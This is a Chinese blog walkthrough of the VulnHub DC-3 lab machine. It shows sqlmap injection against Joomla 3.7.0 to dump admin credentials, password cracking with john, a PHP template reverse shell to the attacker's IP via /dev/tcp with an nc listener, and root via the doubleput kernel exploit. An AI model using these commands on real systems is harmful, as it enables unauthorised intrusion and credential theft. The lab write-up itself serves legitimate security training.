vulnhub靶场之DC-3渗透教程(Joomla CMS)

已于 2024-04-15 18:00:46 修改
阅读量1.3k 收藏 13
点赞数 1
分类专栏: 旺仔_实用笔记 # VulnHub靶场之路 文章标签: php web安全 网络安全
于 2023-06-06 22:35:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50377269/article/details/131075211
版权

目录

0x01靶机概述     

0x02靶场环境搭建

 0x03主机发现

 0x04靶场渗透过程

​ 0x05靶机提权 

0x06渗透实验总结

0x01靶机概述     

靶机基本信息:

靶机下载链接https://download.vulnhub.com/dc/DC-3-2.zip
作者DCAU
发布日期2020年4月25日
难度中等

0x02靶场环境搭建

下载完成后,里面有一个ova的文件,直接导入到VirtualBox当中,如下图

 

 

设置一下网卡模式,我这里用的是仅主机模式

之后直接启动就可以了

 0x03主机发现

arp-scan -l

直接上nmap扫描

nmap-sV -T4 -n 192.168.56.107

 经过nmap扫描发现靶机只开放一个80端口,直接访问,如下图

 0x04靶场渗透过程

 直接上dirb扫描目录试试,如下图所示

dirb http://192.168.56.107/

 扫描到一个administrator的登录页面,发现是一个Joomla的cms,那么我们可以用Joomla扫描器来扫描一下这cms

joomscan -url http://192.168.56.107

如果没有的话直接apt-get install joomscan安装即可

 通过扫描得知Joomla的版本是3.7.0

 我们可以在kali中搜索这个版本的exp,发现有一个注入的,直接查看试一试

locate 42033.txt    #定位文件位置
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt    #查看文件

发现一串sqlmap语句,直接拿来跑一下

sqlmap -u "http://192.168.56.107/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]    #跑库

该命令的参数解释如下:

-u:设置待测试的 URL。

--risk:设置测试时的风险系数,范围为 0~3。

--level:设置测试时的等级,范围为 1~5。

--random-agent:随机伪装用户代理。

--dbs:发现数据库信息。

-p:设置 GET 或 POST 参数名称,这里设置参数名称为 list[fullordering]

 跑出了一个可疑的joomladb库

 那么直接下一步跑表

sqlmap -u "http://192.168.56.107/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

 

 接着跑这个_users中的字段

sqlmap -u "http://192.168.56.107/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T '#_users' --columns

 

 最后跑username和password字段信息

sqlmap -u "http://192.168.56.107/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T '#_users' -C username,password -dump

 跑出用户名admin,和一串加密的密码

直接把密码复制到1.txt中,用john爆破得到密码:snoopy 

 

 话不多说,直接登录网站

登录进来之后就是cms的一些功能,我们可以找上传点上传反弹木马然后把shell反弹回kali

 

 

上传点找到,我们直接插入exec反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.105/1234 0>&1'"); ?>

这里的ip地址是我们kali的ip地址 

kali里面设置监听

nc -lvnp 1234

 接着直接访问刚刚保存的路径,页面左上方也提示了路径所在

 访问这个路径,http://192.168.56.107/templates/beez3/index.php

 kali就反弹回shell了



 0x05靶机提权 

 老样子,直接uname -a查看以下系统内核版本

 然后使用kali的searchspolit查找Ubuntu 16.04的内核提权漏洞

 cat查看这个39772.txt

 发现文本末尾有一个39772exp的压缩包下载地址,但是这个链接现在失效了,于是我去网上找了蛮久找到了这个压缩包,我分享给大家把!

下载链接:

链接:https://pan.baidu.com/s/1SF4fN6qCiLYQYSSxnhq6hw 
提取码:2b5f 
--来自百度网盘超级会员V4的分享

我们可以用python搭建一个暂时的http服务,然后靶机在wget下载这个压缩包

 

解压压缩包,在进入这个目录查看发现有两个压缩包

 

我们解压一下exploit.tar,得到一个ebpf_mapfd_doubleput_exploit目录,发现里面有几个文件

赋予文件可执行权限,再运行文件

  1. chmod +x compile.sh

  2. ./compile.sh

  3. ls

  4. chmod +x doubleput

  5. ./doubleput

然后等待程序运行完成之后,就提升为root权限了

最后查找flag文件

0x06渗透实验总结

1、这个靶场主要考了Joomla的cms框架,然后就是一个外部的提权文件来进行提权

2、因此还是得要多熟悉一下常用的cms,说实话,这个上传点还找了蛮久的哈哈哈

3、希望有不足之处,欢迎各位师傅点评一下!

旺仔Sec
关注
专栏目录
Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)
qq_45722813的博客
12-07 3094
Vulnhub靶场渗透测试DC-3 靶机下载地址:https://www.five86.com/dc-3.html 攻击机为kali2021,IP地址:192.168.172.131 将靶机导入到VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用nmap进行存活主机发现来获取靶机IP地址,命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP,可能是靶机网络设置问题,参考文章:https://editor.csdn.net/md/?artic
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2576
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
DC-3靶场实验
最新发布
2401_84683873的博客
10-07 963
漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。该工具基于Perl开发,能够轻松无缝地对各种Joomla项目进行漏洞扫描,其轻量化和模块化的架构能够保证扫描过程中不会留下过多的痕迹。它不仅能够检测已知漏洞,而且还能够检测到很多错误配置漏洞和管理权限漏洞等等。除此之外,OWASP JoomScan使用起来非常简单,不仅提供了非常友好的用户界面,而且还能够以HTML或文本格式导出扫描报告。
vulnhub靶场DC-3
qq_58091216的博客
01-08 1462
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
DC-3靶场渗透
一纸荒芜的博客
12-12 3695
DC3靶场打靶记录!
Vulnhub DC-3靶机渗透测试(DC系列)
Alexhirchi的博客
10-11 1114
每日学习~ 冲冲冲 VulnHub 入门DC系列之DC-1 说明 靶场下载地址:https://www.vulnhub.com/entry/dc-32,312/ 渗透靶场:VirtualBox 攻击靶机:本地机+kail(VMware) Flag:5个 启动DC-1靶机,界面显示登录界面,这是正常运行情况,我们也并没有登录账号,需要自己去渗透测试进行提权。回到我们的攻击机 ...
vulnhub-DC3
weixin_55129870的博客
05-15 540
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。 开启kali.探测主机存活 nmap -sP 192.168.44.0/24 DC3IP: 192.168.44.143 扫描主机开放服务 nmap -A 192.168.44.143 -p 1-65535 只开放80端口,直接浏览器访问 指纹识别 whatweb http://192.168.44.143/ 结果显示使用apache平台,...
vulnhubdc3
qq_54030686的博客
06-08 315
各位师傅可直接移步至 查看此篇即可,本人只当做笔记,以理清逻辑关系 主机发现 nmap -sS 192.168.2.0/24 发现测试靶机的ip为192.168.2.107,进行端口扫描 发现仅80端口开放进行指纹识别 发现网站使用的框架为joomla,使用专属的joomlascan进行检测, (中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128) 打开相应界面 使用joomlascan进行检测 并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2862
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 3006
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
靶机实操:vulnhub-DC3
不想当脚本小子的脚本小子
12-06 207
今天继续趁着回家来用DC练练手。照旧先是扫一下内网主机,我一般喜欢先找一下存活的主机然后再查看具体的信息,扫描到IP为192.168.249.135。只开放了80端口 访问网页长这样:发现有一个右下角forget操作,一会看看这里有没有可以操作的地方。CMSJoomla,中间件会不会存在漏洞? 接下来常规操作。查看robots没东西,那再扫扫后台,挑几个觉得有用的打开看看。总觉得最终的落脚点会在刚才的忘记用户名和密码那里,一会看看会不会被打脸哈哈哈哈 登录界面先简单sql..
Vulnhub靶机DC系列-DC-3.2
m0_54525483的博客
12-31 1251
Vulnhub靶机DC系列-DC-3.2 靶场名称:DC-2 下载地址: DC-3-2.zip (Size: 1005 MB) Download: http://www.five86.com/downloads/DC-3-2.zip Download (Mirror): https://download.vulnhub.com/dc/DC-3-2.zip Download (Torrent): https://download.vulnhub.com/dc/DC-3-2.zip.torrent ( Ma
Vulnhub DC-3
柠檬木有枝
07-14 1179
访问服务,发现是 joomla 服务,使用 joomlacan 扫描 joomlascan -u 192.168.6.129 3.7.0 版本,存在 SQl 注入漏洞(CVE-2017-8917) github 下载 exp 然后运行,获取到用户名密码 hash 使用 hashcat 破解 hash,破解密码得 snoopy 登录到后台 发现提示,需要获取到 root 权限 编辑模版,修改...
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3453
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
DC-3靶场渗透测试
m0_70489261的博客
03-17 407
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。
VulnHubDC-3
qq_45434762的博客
03-23 539
一个粗糙的信息收集通过扫描端口信息,我们看到服务器只开放了一个80端口,运行的是Joomla框架我们打开网站看看在首页提示我们,这个靶机只有一个Flag,并且没有任何线索使用dirb扫...
vulnhub靶机】DC-3
travelnight的博客
03-10 4873
原知识星球老文搬运 拿到靶机之后导入到virtualBOX里面。 1. nmap扫描主机存活,192.168.56.104 有个80端口,不放心的话可以用masscan。 2. 直接访问看下,这里提示只有一个flag,直接拿到root权限。 3. 习惯性的上一下dirbuster。发现访问到不存在的URL时候服务器也是返回200OK,这个扫描就没有什么参考价值了。 4.御剑扫描一下,发现后台页面。这个是joomlaCMS 5.参考了下知乎的这个joomla渗透,https
靶机DC-3—WP
m0_66638011的博客
05-17 1833
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
DC-3靶机
m0_57954651的博客
10-01 1911
保存就上传 然后进行测试访问 (再根据joomla的特性 模块会单独放在一个文件夹里/templates/ 而beez3模块就在/templates/beez3/里面 刚才创建的webshell路径为)http://192.168.47.150/templates/beez3/shell.php。文本写的是漏洞产生的原因 描述和漏洞利用的方法 还附上了exp 最后一行的连接 (执行下两个文件 Linux系统下.(点)是执行某个文件的意思 (./compile.sh)
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旺仔Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值